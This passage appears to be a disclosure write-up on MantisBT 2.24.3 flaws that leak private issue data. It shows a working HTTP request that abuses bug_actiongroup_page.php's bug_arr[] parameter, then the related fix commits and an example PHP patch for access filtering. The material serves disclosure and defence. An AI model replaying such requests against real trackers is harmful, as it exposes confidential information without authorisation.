Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:56:39 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
```

- We finally leaked the full information of a private issue!

### It's too late

The following functions allow me to disclose the title; this stuff can be found on ``bug_actiongroup_page.php``

**This is the overall request; they just have a different action value**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION
```

The title of this section is "too late" because they don't allow certain functionality, but they have already leaked the summary:

- move issues returns ``You did not have appropriate permissions to perform that action.``
- assign issues returns ``You did not have appropriate permissions to perform that action.``
- close issue returns ``You did not have appropriate permissions to perform that action.``
- delete issue returns ``You did not have appropriate permissions to perform that action.``
- resolve issues returns ``You did not have appropriate permissions to perform that action.``
- set sticky returns ``You did not have appropriate permissions to perform that action.``
- update priority returns ``You did not have appropriate permissions to perform that action.``
- update severity returns ``Access Denied.``
- update status returns ``You did not have appropriate permissions to perform that action.``
- update view returns ``You did not have appropriate permissions to perform that action.``
- add note returns ``Access Denied.``
- attach tags returns ``Attach permission denied.``
MantisBT: master cff10f26 2020-12-06 07:39

Avoid private project name disclosure

When an unprivileged user tries to access a private project via manage_proj_edit_page.php, they receive an Access Denied as expected, but the project's name is leaked via the navbar's project selector.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting and providing an initial patch for this bug.

Fixes 0027726, 0027357, CVE-2020-29603

Affected Issues: 0027357, 0027726

mod - core/layout_api.php

MantisBT: master 12a9dcbb 2020-12-06 13:08

Prevent disclosure of private issue summary

Insufficient access level checks allowed an attacker to display private issues' summary via Group Actions (bug_actiongroup_page.php).

Going through the provided list of issue IDs (bug_arr[]) and removing any issues the user does not have access to, fixes the vulnerability.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue.

Fixes 0027727, 0027357, CVE-2020-29605

Affected Issues: 0027357, 0027727

mod - bug_actiongroup_page.php

MantisBT: master b2da7352 2020-12-06 13:43

Prevent full private issue disclosure

Missing access check in bug_actiongroup.php allows an attacker with rights to create new issues to use the COPY group action to create a clone of any private issue (including all bugnotes and attachments), thus gaining full access to potentially confidential information.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue.

Fixes 0027728, 0027357, CVE-2020-29604

Affected Issues: 0027357, 0027728

mod - bug_actiongroup.php
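The two group-action commits above describe the same missing check applied at two points of the request path: the page step (bug_actiongroup_page.php) must drop every id in bug_arr[] the user may not view before it renders a summary, and the action step (bug_actiongroup.php) must repeat that check before COPY clones anything, because it receives its own POST. It also explains the reporter's "It's too late" observation: the summary was rendered at the page step, before any action-level permission check ran. The following self-contained PHP sketch is an added example of that logic and is not MantisBT's own code or patch; the in-memory projects, issues, membership table and every function name in it are constructed for the example, and MantisBT's real access API is not used.

```php
<?php
declare(strict_types=1);

// Added example, not MantisBT's own code or patch. It models the access check
// the fixes add to the group-action request path: a POST may name any issue
// id in bug_arr[], so each id is checked against the requesting user's view
// access before the page shows its summary or the COPY action clones it.
// All data, names and functions below are constructed for this example.

// Constructed sample data: a public project and a private one.
$GLOBALS['projects'] = [
    1 => ['name' => 'first project',  'is_private' => false],
    2 => ['name' => 'second project', 'is_private' => true],
];
$GLOBALS['bugs'] = [
    7 => ['project_id' => 2, 'summary' => 'This is my private issue please dont access me'],
    8 => ['project_id' => 1, 'summary' => 'Hello I am the attacker'],
];
// Constructed: members of each private project (project_id => user names).
$GLOBALS['private_members'] = [
    2 => ['administrator'],
];

/** Public projects are visible to everyone; private ones only to their members. */
function user_can_view_project(string $user, int $project_id): bool
{
    $project = $GLOBALS['projects'][$project_id] ?? null;
    if ($project === null) {
        return false;
    }
    if (!$project['is_private']) {
        return true;
    }
    return in_array($user, $GLOBALS['private_members'][$project_id] ?? [], true);
}

/** An issue is visible when it exists and its project is; unknown ids are denied. */
function user_can_view_bug(string $user, int $bug_id): bool
{
    $bug = $GLOBALS['bugs'][$bug_id] ?? null;
    return $bug !== null && user_can_view_project($user, $bug['project_id']);
}

/**
 * The check the page step was missing: normalise the submitted ids and drop
 * every one the user may not view, so nothing about them reaches the page.
 */
function filter_accessible_bug_ids(string $user, array $bug_arr): array
{
    $ids = array_values(array_map('intval', $bug_arr));
    return array_values(array_filter($ids, function (int $id) use ($user): bool {
        return user_can_view_bug($user, $id);
    }));
}

/** Before the fix: the "Selected Issues" table is built straight from bug_arr[]. */
function selected_issues_vulnerable(array $bug_arr): array
{
    $rows = [];
    foreach (array_map('intval', $bug_arr) as $id) {
        if (isset($GLOBALS['bugs'][$id])) {
            $rows[$id] = $GLOBALS['bugs'][$id]['summary'];
        }
    }
    return $rows;
}

/** After the fix: the same table, built from the filtered list only. */
function selected_issues_fixed(string $user, array $bug_arr): array
{
    return selected_issues_vulnerable(filter_accessible_bug_ids($user, $bug_arr));
}

/**
 * The COPY handler receives its own POST, so it cannot rely on the page step
 * having filtered anything: it repeats the check and refuses the whole request
 * if any id is not viewable. Returns the ids to copy, or null when denied.
 */
function copy_issues(string $user, array $bug_arr, int $target_project): ?array
{
    if (!user_can_view_project($user, $target_project)) {
        return null;
    }
    $ids = array_values(array_map('intval', $bug_arr));
    foreach ($ids as $id) {
        if (!user_can_view_bug($user, $id)) {
            return null;
        }
    }
    return $ids;
}

// Demonstration with the ids from the report: 8 is public, 7 is in the private project.
$user = 'manager';
var_dump(selected_issues_vulnerable(['8', '7']));   // vulnerable path: issue 7's summary is included
var_dump(selected_issues_fixed($user, ['8', '7']));  // fixed path: only issue 8 is listed
var_dump(copy_issues($user, ['7'], 1));              // refused: 7 is not viewable by this user
var_dump(copy_issues($user, ['8'], 1));              // allowed
```

Run it with `php example.php`. The design point is that the filter runs on the server side at every entry point that consumes bug_arr[], and that a non-existent id is treated exactly like an inaccessible one, so the response cannot be used to distinguish "does not exist" from "exists but is private".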